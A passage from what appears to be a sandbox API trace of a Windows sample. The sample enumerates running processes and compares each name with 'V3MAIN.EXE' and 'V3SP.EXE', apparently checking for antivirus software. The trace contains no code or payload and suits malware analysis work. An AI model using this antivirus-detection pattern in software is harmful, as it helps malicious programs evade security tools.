lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.354] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.354] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.354] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.354] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.354] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.354] lstrlenW (lpString="svchost.exe") returned 11 [0163.354] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.354] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.354] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.355] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.355] lstrlenW (lpString="svchost.exe") returned 11 [0163.355] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.355] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.355] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.355] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.355] lstrlenW (lpString="winpoint.exe") returned 12 [0163.355] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.355] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.356] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.356] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.356] lstrlenW (lpString="cmd.exe") returned 7 [0163.356] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.356] lstrcmpW (lpString1="CMD.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.356] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.357] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.357] lstrlenW (lpString="conhost.exe") returned 11 [0163.357] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.357] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.357] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.357] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.357] lstrlenW (lpString="PING.EXE") returned 8 [0163.357] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.357] lstrcmpW (lpString1="PING.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.357] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.358] CloseHandle (hObject=0xe0) returned 1 [0163.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.359] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3SP.EXE" | out: lpString1="V3SP.EXE") returned="V3SP.EXE" [0163.359] lstrlenW (lpString="V3SP.EXE") returned 8 [0163.359] CharUpperBuffW (in: lpsz="V3SP.EXE", cchLength=0x8 | out: lpsz="V3SP.EXE") returned 0x8 [0163.359] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.360] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.360] lstrlenW (lpString="[System Process]") returned 16 [0163.360] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.360] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3SP.EXE") returned -1 [0163.360] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.360] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.360] lstrlenW (lpString="System") returned 6 [0163.360] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.360] lstrcmpW (lpString1="SYSTEM", lpString2="V3SP.EXE") returned -1 [0163.360] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.361] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.361] lstrlenW (lpString="smss.exe") returned 8 [0163.361] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.361] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.361] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.361] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.362] lstrlenW (lpString="csrss.exe") returned 9 [0163.362] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.362] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.362] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.362] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.362] lstrlenW (lpString="wininit.exe") returned 11 [0163.362] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.362] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3SP.EXE") returned 1 [0163.362] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.363] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.363] lstrlenW (lpString="csrss.exe") returned 9 [0163.363] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.363] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.363] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.363] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.363] lstrlenW (lpString="winlogon.exe") returned 12 [0163.363] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.363] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3SP.EXE") returned 1 [0163.363] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.364] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.364] lstrlenW (lpString="services.exe") returned 12 [0163.364] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.364] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3SP.EXE") returned -1 [0163.364] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.364] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.365] lstrlenW (lpString="lsass.exe") returned 9 [0163.365] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.365] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3SP.EXE") returned -1 [0163.365] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.365] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.365] lstrlenW (lpString="lsm.exe") returned 7 [0163.365] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.365] lstrcmpW (lpString1="LSM.EXE", lpString2="V3SP.EXE") returned -1 [0163.365] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.366] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.366] lstrlenW (lpString="svchost.exe") returned 11 [0163.366] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.366] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.366] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.366] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.366] lstrlenW (lpString="svchost.exe") returned 11 [0163.366] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.366] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.366] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.367] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.367] lstrlenW (lpString="svchost.exe") returned 11 [0163.367] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.367] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.367] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.367] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.367] lstrlenW (lpString="svchost.exe") returned 11 [0163.367] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.367] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.367] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.368] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.368] lstrlenW (lpString="svchost.exe") returned 11 [0163.368] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.368] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.368] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.368] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.368] lstrlenW (lpString="audiodg.exe") returned 11 [0163.368] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.369] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3SP.EXE") returned -1 [0163.369] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.369] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.369] lstrlenW (lpString="svchost.exe") returned 11 [0163.369] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.369] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.369] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.370] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.370] lstrlenW (lpString="svchost.exe") returned 11 [0163.370] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.370] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.370] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.371] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.371] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.371] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.371] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3SP.EXE") returned -1 [0163.371] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.371] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.371] lstrlenW (lpString="svchost.exe") returned 11 [0163.371] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.371] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.371] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.372] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.372] lstrlenW (lpString="taskhost.exe") returned 12 [0163.372] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.372] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.372] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.373] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.373] lstrlenW (lpString="taskeng.exe") returned 11 [0163.373] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.373] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3SP.EXE") returned -1 [0163.373] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.374] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.374] lstrlenW (lpString="dwm.exe") returned 7 [0163.374] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.374] lstrcmpW (lpString1="DWM.EXE", lpString2="V3SP.EXE") returned -1 [0163.374] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.375] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.375] lstrlenW (lpString="explorer.exe") returned 12 [0163.375] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.375] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3SP.EXE") returned -1 [0163.375] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.375] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.375] lstrlenW (lpString="taskeng.exe") returned 11 [0163.375] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.376] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3SP.EXE") returned -1 [0163.376] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.376] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.376] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.376] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.376] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3SP.EXE") returned -1 [0163.376] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.377] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.377] lstrlenW (lpString="taskhost.exe") returned 12 [0163.377] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.377] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.377] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.378] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.378] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.378] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.378] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3SP.EXE") returned -1 [0163.378] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.378] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.378] lstrlenW (lpString="tri.exe") returned 7 [0163.379] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.379] lstrcmpW (lpString1="TRI.EXE", lpString2="V3SP.EXE") returned -1 [0163.379] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.379] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.379] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.379] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.379] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3SP.EXE") returned -1 [0163.379] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.380] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.380] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.380] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", 